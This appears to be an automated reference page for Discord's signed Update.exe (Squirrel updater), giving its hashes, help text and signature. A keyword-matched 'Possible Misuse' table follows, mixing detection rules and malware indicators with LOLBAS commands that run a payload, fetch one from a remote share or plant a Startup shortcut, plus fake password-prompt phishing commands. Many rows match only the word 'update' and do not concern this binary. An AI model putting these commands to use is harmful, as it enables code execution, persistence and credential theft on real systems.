Update.exe

  • File Path: C:\Users\user\AppData\Local\Discord\Update.exe
  • Description: Update
  • Comments: Update

Hashes

Type Hash
MD5 E039F56DC6315942BC3E3D9AD4D586E7
SHA1 5158B6BF1F2B278E9524D48FAB8D9BFDCDF0ED50
SHA256 E510AE1A59DD629D0C03425BCC4457E68926FE7B204154D9EEBCE9D2985925A1
SHA384 68FCF20588014601C18B05970C2BA60C6563BE06610022F7A5B5027D32DB7275CBF924464C9D53773B12CB08251E4127
SHA512 2B20A423F7D54C1C3009A30F47EE7774E0B6170C03C3FBB63804551E43751D31BFA16762FB63DAE0349A7E93E8009C98E9CEC56BF6ACC6151E283F7774619A60
SSDEEP 12288:E6CyLEgR0ro/0EhcXAHjRYSN9bUlOr/oJfT9Pu0XejfQ1JRQ3Tzvx+nDIpnU5:VEgRN/th3VelBPu0XUfWJms0pnk
IMP F34D5F2D4577ED6D9CEEC516C1F5A744
PESHA1 CE9C10B3BCC13CF815471306E07F11E39D838DFA
PE256 0D8E47413FD6C3B272ADBAB65072AEAAF5940BCCA4EECC4AF0CFB27604A0FFAE

Runtime Data

Usage (stdout):

Starting Update.exe
7924> 2021-11-06 20:00:36> Program: Starting Squirrel Updater: --help
Usage: Squirrel.exe command [OPTS]
Manages Squirrel packages

Commands
      --install=VALUE        Install the app whose package is in the specified
                               directory
      --check=VALUE          Download the releases information specified by the
                               URL and write new results to stdout as JSON.
                               Does not download the actual packages
      --uninstall            Uninstall the app the same dir as Update.exe
      --download=VALUE       Download the releases specified by the URL and
                               write new results to stdout as JSON
      --update=VALUE         Update the application to the latest remote
                               version specified by URL
      --releasify=VALUE      Update or generate a releases directory with a
                               given NuGet package
      --createShortcut=VALUE Create a shortcut for the given executable name
      --removeShortcut=VALUE Remove a shortcut for the given executable name
      --updateSelf=VALUE     Copy the currently executing Update.exe into the
                               default location

Options:
  -h, -?, --help             Display Help and exit
  -r, --releaseDir=VALUE     Path to a release directory to use with releasify
  -p, --packagesDir=VALUE    Path to the NuGet Packages directory for C# apps
      --bootstrapperExe=VALUE
                             Path to the Setup.exe to use as a template
  -g, --loadingGif=VALUE     Path to an animated GIF to be displayed during
                               installation
  -i, --icon=VALUE           Path to an ICO file that will be used for icon
                               shortcuts
      --setupIcon=VALUE      Path to an ICO file that will be used for the
                               Setup executable's icon
  -n, --signWithParams=VALUE Sign the installer via SignTool.exe with the
                               parameters given
  -s, --silent               Silent install
  -l, --shortcut-locations=VALUE
                             Comma-separated string of shortcut locations, e.g.
                               'Desktop,StartMenu'
      --no-msi               Don't generate an MSI package
      --updateOnly           For createShortcut, should we only update an
                               existing link

Loaded Modules:

Path
C:\Users\user\AppData\Local\Discord\Update.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 01E20D5BE0B5190B1DBFDE9BEF380D9A
  • Thumbprint: A10EB13B255A9F3BFDA8664182B0F529B649DA3D
  • Issuer: CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
  • Subject: CN=Discord Inc., OU=Select or enter, O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US

File Metadata

  • Original Filename: Update.exe
  • Product Name: Update
  • Company Name: GitHub
  • File Version: 1.1.1.0
  • Product Version: 1.1.1.0
  • Language: Language Neutral
  • Legal Copyright: Copyright GitHub 2013-2015
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/e510ae1a59dd629d0c03425bcc4457e68926fe7b204154d9eebce9d2985925a1/detection

Possible Misuse

The following table contains possible examples of Update.exe being misused. While Update.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma aws_lambda_function_created_or_invoked.yml update: 2021/10/13 DRL 1.0
sigma passed_role_to_glue_development_endpoint.yml update: 2021/10/13 DRL 1.0
sigma azure_aadhybridhealth_adfs_new_server.yml This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. DRL 1.0
sigma azure_app_credential_modification.yml properties.message: "Update application - Certificates and secrets management" DRL 1.0
sigma azure_device_or_configuration_modified_or_deleted.yml - Update device DRL 1.0
sigma azure_device_or_configuration_modified_or_deleted.yml - Update device configuration DRL 1.0
sigma azure_keyvault_key_modified_or_deleted.yml - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION DRL 1.0
sigma azure_keyvault_secrets_modified_or_deleted.yml - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION DRL 1.0
sigma gcp_bucket_modified_or_deleted.yml - storage.buckets.update DRL 1.0
sigma gcp_dns_zone_modified_or_deleted.yml - Dns.ManagedZones.Update DRL 1.0
sigma gcp_firewall_rule_modified_or_deleted.yml - v*.Compute.Firewalls.Update DRL 1.0
sigma gcp_kubernetes_rolebinding.yml - io.k8s.authorization.rbac.v*.clusterrolebindings.update DRL 1.0
sigma gcp_kubernetes_rolebinding.yml - io.k8s.authorization.rbac.v*.rolebindings.update DRL 1.0
sigma gcp_kubernetes_secrets_modified_or_deleted.yml - io.k8s.core.v*.secrets.update DRL 1.0
sigma gcp_service_account_modified.yml - .serviceAccounts.update DRL 1.0
sigma gcp_sql_database_modified_or_deleted.yml - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update DRL 1.0
sigma gcp_sql_database_modified_or_deleted.yml - cloudsql.users.update DRL 1.0
sigma okta_application_modified_or_deleted.yml - application.lifecycle.update DRL 1.0
sigma okta_application_sign_on_policy_modified_or_deleted.yml - application.policy.sign_on.update DRL 1.0
sigma okta_policy_modified_or_deleted.yml - policy.lifecycle.update DRL 1.0
sigma okta_policy_rule_modified_or_deleted.yml - policy.rule.update DRL 1.0
sigma lnx_install_root_certificate.yml - '/update-ca-certificates' DRL 1.0
sigma lnx_install_root_certificate.yml - '/update-ca-trust' DRL 1.0
sigma zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 DRL 1.0
sigma zeek_smb_converted_win_lm_namedpipe.yml - update the excluded named pipe to filter out any newly observed legit named pipe DRL 1.0
sigma proxy_susp_flash_download_loc.yml title: Flash Player Update from Suspicious Location DRL 1.0
sigma proxy_susp_flash_download_loc.yml description: Detects a flashplayer update from an unofficial location DRL 1.0
sigma proxy_ua_apt.yml - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ DRL 1.0
sigma proxy_ua_bitsadmin_susp_tld.yml - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca DRL 1.0
sigma proxy_ua_frameworks.yml # Metasploit Update by Florian Roth 08.07.2017 DRL 1.0
sigma win_lm_namedpipe.yml - update the excluded named pipe to filter out any newly observed legit named pipe DRL 1.0
sigma win_security_mal_service_installs.yml author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) DRL 1.0
sigma win_susp_lsass_dump_generic.yml author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) DRL 1.0
sigma win_susp_lsass_dump_generic.yml - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it DRL 1.0
sigma sysmon_rclone_execution.yml - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html DRL 1.0
sigma driver_load_vuln_dell_driver.yml title: Vulnerable Dell BIOS Update Driver Load DRL 1.0
sigma driver_load_vuln_dell_driver.yml description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 DRL 1.0
sigma sysmon_powershell_exploit_scripts.yml - '\Remove-Update.ps1' DRL 1.0
sigma av_printernightmare_cve_2021_34527.yml - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 DRL 1.0
sigma av_printernightmare_cve_2021_34527.yml - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 DRL 1.0
sigma sysmon_wuauclt_network_connection.yml description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. DRL 1.0
sigma sysmon_mal_cobaltstrike_re.yml - PipeName\|re: '\\\\windows\.update\.manager[0-9a-f]{2,3}' DRL 1.0
sigma sysmon_susp_cobaltstrike_pipe_patterns.yml - '\windows.update.manager' DRL 1.0
sigma powershell_malicious_commandlets.yml author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) DRL 1.0
sigma powershell_malicious_commandlets.yml - "Remove-Update" DRL 1.0
sigma powershell_nishang_malicious_commandlets.yml - Remove-Update DRL 1.0
sigma sysmon_cred_dump_lsass_access.yml oscd.community (update) DRL 1.0
sigma sysmon_cred_dump_lsass_access.yml - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it DRL 1.0
sigma sysmon_proxy_execution_wuauclt.yml description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code. DRL 1.0
sigma win_apt_revil_kaseya.yml - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ DRL 1.0
sigma win_etw_trace_evasion.yml - "update" DRL 1.0
sigma win_exploit_cve_2019_1378.yml - https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua DRL 1.0
sigma win_lolbas_execution_of_wuauclt.yml description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. DRL 1.0
sigma win_lolbas_execution_of_wuauclt.yml - Wuaueng.dll which is a module belonging to Microsoft Windows Update. DRL 1.0
sigma win_rasautou_dll_execution.yml definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) DRL 1.0
sigma win_renamed_jusched.yml Description: Java Update Scheduler DRL 1.0
sigma win_renamed_jusched.yml Description: Java(TM) Update Scheduler DRL 1.0
sigma win_susp_control_cve_2021_40444.yml - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 DRL 1.0
sigma win_susp_powershell_empire_uac_bypass.yml - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)' DRL 1.0
sigma win_susp_powershell_empire_uac_bypass.yml - ' -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);' DRL 1.0
sigma win_susp_rclone_execution.yml - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html DRL 1.0
sigma win_susp_squirrel_lolbin.yml Image\|endswith: '\update.exe' # Check if folder Name matches executed binary \\(?P<first>[^\\]*)\\Update.*Start.{2}(?P<second>\1)\.exe (example: https://regex101.com/r/SGSQGz/2) DRL 1.0
sigma win_susp_wuauclt.yml title: Windows Update Client LOLBIN DRL 1.0
sigma win_susp_wuauclt.yml description: Detects code execution via the Windows Update client (wuauclt) DRL 1.0
sigma win_uac_bypass_ntfs_reparse_point.yml CommandLine\|endswith: '\AppData\Local\Temp\update.msu' DRL 1.0
sigma sysmon_config_modification_error.yml - 'Failed to connect to the driver to update configuration' DRL 1.0
sigma win_apt_apt29_tor.yml title: APT29 Google Update Service Install DRL 1.0
sigma win_apt_apt29_tor.yml description: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe DRL 1.0
sigma win_apt_apt29_tor.yml ServiceName: 'Google Update' DRL 1.0
sigma win_mal_service_installs.yml author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) DRL 1.0
sigma win_remote_schtask.yml description: Detects remote execution via scheduled task creation or update on the destination host DRL 1.0
sigma ecs-zeek-elastic-beats-implementation.yml nextUpdate: zeek.ocsp.update.next DRL 1.0
sigma ecs-zeek-elastic-beats-implementation.yml thisUpdate: zeek.ocsp.update.this DRL 1.0
LOLBAS gh-pages.yml name: Update LOLBAS-Project.github.io  
LOLBAS gh-pages.yml commit_message: "Applying update "  
LOLBAS Upload.yml Name: Update.exe  
LOLBAS Upload.yml Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.  
LOLBAS Upload.yml - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"  
LOLBAS Upload.yml Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.  
LOLBAS Upload.yml - Path: '%localappdata%\Whatsapp\Update.exe'  
LOLBAS Upload.yml - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'  
LOLBAS Cmdl32.yml - IOC: Useragent Microsoft(R) Connection Manager Vpn File Update  
LOLBAS Pktmon.yml Description: Capture Network Packets on the windows 10 with October 2018 Update or later.  
LOLBAS Wuauclt.yml Description: Windows Update Client  
LOLBAS Squirrel.yml Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.  
LOLBAS Squirrel.yml - Command: squirrel.exe --update [url to package]  
LOLBAS Squirrel.yml - IOC: Update.exe spawned an unknown process  
LOLBAS Squirrel.yml - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56  
LOLBAS Update.yml Name: Update.exe  
LOLBAS Update.yml Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.  
LOLBAS Update.yml - Command: Update.exe --download [url to package]  
LOLBAS Update.yml - Command: Update.exe --update=[url to package]  
LOLBAS Update.yml - Command: Update.exe --update=\\remoteserver\payloadFolder  
LOLBAS Update.yml - Command: Update.exe --updateRollback=[url to package]  
LOLBAS Update.yml - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"  
LOLBAS Update.yml Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.  
LOLBAS Update.yml - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder  
LOLBAS Update.yml - Command: Update.exe --createShortcut=payload.exe -l=Startup  
LOLBAS Update.yml Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.  
LOLBAS Update.yml - Command: Update.exe --removeShortcut=payload.exe -l=Startup  
LOLBAS Update.yml - Path: '%localappdata%\Microsoft\Teams\update.exe'  
LOLBAS Update.yml - IOC: Update.exe spawned an unknown process  
LOLBAS Update.yml - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56  
malware-ioc attor Adobe Acrobat Update v3.17.lkws © ESET 2014-2018
malware-ioc attor Adobe Acrobat Update Service v3.2.muitnl © ESET 2014-2018
malware-ioc attor %ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\s3x © ESET 2014-2018
malware-ioc attor %ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\d5l © ESET 2014-2018
malware-ioc attor === Update folder paths © ESET 2014-2018
malware-ioc attor %ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\v1e © ESET 2014-2018
malware-ioc attor %ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\k7f © ESET 2014-2018
malware-ioc casbaneiro === Campaign 1: Fishy financial manager update © ESET 2014-2018
malware-ioc cdrthief ==== Files created during malware update © ESET 2014-2018
malware-ioc evilnum https://api.adobe.com[.]kz/update/check © ESET 2014-2018
malware-ioc evilnum == February 2021 Pyvil and Evilnum Update © ESET 2014-2018
malware-ioc evilnum These are the IOCs for our https://twitter.com/ESETresearch[update on @ESETresearch twitter]. © ESET 2014-2018
malware-ioc evilnum \|AF5F9CD45757F928E5BCC6F50BCD62AAB50119C1\|fsnotifier32.exe \|Google Update Core \|14FDFFEB640F897C120870155F7FB2C8EA62AF44``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc invisimole.yar $s17 = "update.xn--6frz82g" ascii wide © ESET 2014-2018
malware-ioc invisimole.yar $s25 = "update.xn--6frz82g" ascii wide © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "update.xn—​6frz82g", © ESET 2014-2018
malware-ioc invisimole * update[.]xn–6frz82g``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\armsvc.exe", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\firewall.exe", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\ADelRCP.exe", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\SystemArchitectureTranslation.exe", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\libstringutils.dll", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\settings.cfg", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\Setup.dll", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\Updater.exe", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\setup-version.json", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\client-version.dll", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\backup\\", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\backup.log", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "Adobe Update Task", © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\ADelRCP.exe © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\SystemArchitectureTranslation.exe © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\libstringutils.dll © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\settings.cfg © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\Setup.dll © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\Updater.exe © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\setup-version.json © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\client-version.dll © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\backup\ © ESET 2014-2018
malware-ioc kryptocibule %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\backup.log © ESET 2014-2018
malware-ioc kryptocibule \|Adobe Update Task\|%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc kryptocibule Identity Service, in, allow, %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe © ESET 2014-2018
malware-ioc kryptocibule Identity Service, out, allow, %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe © ESET 2014-2018
malware-ioc kryptocibule Java Runtime Update, in, allow, %LocalAppData%\Java Runtime\transmission-remote.exe © ESET 2014-2018
malware-ioc kryptocibule Java Runtime Update, out, allow, %LocalAppData%\Java Runtime\transmission-remote.exe © ESET 2014-2018
malware-ioc moose likely update their technique and tools to evade detection and thwart © ESET 2014-2018
malware-ioc nightscout === Malicious Update variant 1 © ESET 2014-2018
malware-ioc nightscout === Malicious Update variant 2 © ESET 2014-2018
malware-ioc nightscout === Malicious Update variant 3 © ESET 2014-2018
malware-ioc nightscout === Malicious Update variant 4 © ESET 2014-2018
malware-ioc nightscout update.boshiamys[.]com © ESET 2014-2018
malware-ioc nightscout === Malicious update URLs © ESET 2014-2018
malware-ioc nukesped_lazarus .Update.exe``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc oceanlotus == OceanLotus : macOS backdoor update © ESET 2014-2018
malware-ioc oceanlotus For a description of OceanLotus' latest macOS update © ESET 2014-2018
malware-ioc oceanlotus https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/[OceanLotus article]. © ESET 2014-2018
malware-ioc potao likely update their technique and tools to evade detection and thwart © ESET 2014-2018
malware-ioc 2020_Q2 == Operation In(ter)ception Update © ESET 2014-2018
malware-ioc 2020_Q3 - ++http://www.maxscript.cc/update/upscript[.]mse++``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc 2020_Q4 update.npicgames[.]com © ESET 2014-2018
malware-ioc 2021_T2 library-update[.]com © ESET 2014-2018
malware-ioc rtm Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host © ESET 2014-2018
malware-ioc rtm Windows Update © ESET 2014-2018
malware-ioc sparklinggoblin - ++update.facebookint.workers[.]dev++``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc sshdoor \|Hash (SHA-1) \|UUID \|C&C \|URL to update C&C\| Backdoor password © ESET 2014-2018
malware-ioc stantinko \|Stantinko Installer \| udservice.exe \| update.ultimate-discounter[.]com © ESET 2014-2018
malware-ioc stantinko HKLM\SYSTEM\CurrentControlSet\services\Coupons Browser Update Service\ © ESET 2014-2018
malware-ioc stantinko.misp-event.json "value": "update.ultimate-discounter.com\|178.20.159.56", © ESET 2014-2018
malware-ioc stantinko.misp-event.json "value": "HKLM\\SYSTEM\\CurrentControlSet\\services\\Coupons Browser Update Service\\", © ESET 2014-2018
malware-ioc misp-mosquito-event.json "value": "http:\/\/get.adobe.com\/flashplayer\/download\/update\/x32", © ESET 2014-2018
malware-ioc misp-mosquito-event.json "value": "http:\/\/get.adobe.com\/flashplayer\/download\/update\/x64", © ESET 2014-2018
malware-ioc turla ** FSStorage::Update``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc turla ** RegStorage::Update``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc turla - ++http://get.adobe[.]com/flashplayer/download/update/x32++``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc turla - ++http://get.adobe[.]com/flashplayer/download/update/x64++``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc windigo *UPDATE 2017-10-30*: This documents now contains the latest IOCs for version © ESET 2014-2018
malware-ioc windigo likely update their technique and tools to evade detection and thwart © ESET 2014-2018
malware-ioc windigo *UPDATE*: As we expected, the malicious group is monitoring our indicators of © ESET 2014-2018
malware-ioc gaming_supply_chain.misp_event.json "comment": "2nd stage update server (HTTP)", © ESET 2014-2018
malware-ioc gaming_supply_chain.misp_event.json "description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)", © ESET 2014-2018
malware-ioc winnti_group \| checkin.travelsanignacio.com \| Second stage update server © ESET 2014-2018
atomic-red-team T1056.002.md osascript -e ‘tell app “System Preferences” to activate’ -e ‘tell app “System Preferences” to activate’ -e ‘tell app “System Preferences” to display dialog “Software Update requires that you type your password to apply changes.” & return & return default answer “” with icon 1 with hidden answer with title “Software Update”’ MIT License. © 2018 Red Canary
atomic-red-team T1056.002.md $cred = $host.UI.PromptForCredential(‘Windows Security Update’, ‘’,[Environment]::UserName, [Environment]::UserDomainName) MIT License. © 2018 Red Canary
atomic-red-team T1070.md Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output MIT License. © 2018 Red Canary
atomic-red-team T1110.004.md if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo “This test requires sshpass” ; fi ; MIT License. © 2018 Red Canary
atomic-red-team T1176.md Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. MIT License. © 2018 Red Canary
atomic-red-team T1543.002.md if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i ‘ID=”centos”’) ]; then chkconfig T1543.002 on ; else echo “Please run this test on Ubnutu , kali OR centos” ; fi ; MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md | reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| MIT License. © 2018 Red Canary
atomic-red-team T1553.004.md update-ca-trust MIT License. © 2018 Red Canary
atomic-red-team T1553.004.md echo sudo update-ca-certificates MIT License. © 2018 Red Canary
atomic-red-team T1562.008.md Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail MIT License. © 2018 Red Canary
atomic-red-team T1562.008.md aws cloudtrail update-trail –name #{cloudtrail_name} –s3-bucket-name #{s3_bucket_name} –is-multi-region-trail –region #{region} MIT License. © 2018 Red Canary
signature-base apt_apt10.yar $c2_897 = “update.yourtrap.com” ascii CC BY-NC 4.0
signature-base apt_bigbang.yar $x7 = “VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu” fullword ascii /* base64 encoded string ‘Update prog: There is no old file in temp.’ */ CC BY-NC 4.0
signature-base apt_danti_svcmondr.yar $s4 = “\update.dat” fullword ascii CC BY-NC 4.0
signature-base apt_derusbi.yar $s2 = “Update.dll” fullword ascii CC BY-NC 4.0
signature-base apt_dragonfly.yar $s1 = “\Update\Temp\ufiles.txt” fullword wide CC BY-NC 4.0
signature-base apt_glassRAT.yar $s2 = “update.dll” fullword ascii CC BY-NC 4.0
signature-base apt_irongate.yar description = “Detects a PyInstaller file named update.exe as mentioned in the IronGate APT” CC BY-NC 4.0
signature-base apt_irontiger_trendmicro.yar $str2 = “(can not update server recently)!” nocase wide ascii CC BY-NC 4.0
signature-base apt_keyboys.yar /* Update March 2018 */ CC BY-NC 4.0
signature-base apt_khrat.yar $x1 = “http.open "POST", "http://update.upload-dropbox[.]com/docs/tz/GetProcess.php",False,"","" “ fullword ascii CC BY-NC 4.0
signature-base apt_lazarus_jun18.yar $s3 = “update” fullword wide /* Goodware String - occured 254 times */ CC BY-NC 4.0
signature-base apt_middle_east_talosreport.yar $s5 = “update software online” fullword wide CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar $magic1 = “‘https://update.microsoft.com/driverupdate?id=” ascii wide CC BY-NC 4.0
signature-base apt_oilrig.yar $x1 = “Get-Content $env:Public\Libraries\update.vbs) -replace” ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x3 = “Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\update.vbs")” fullword ascii CC BY-NC 4.0
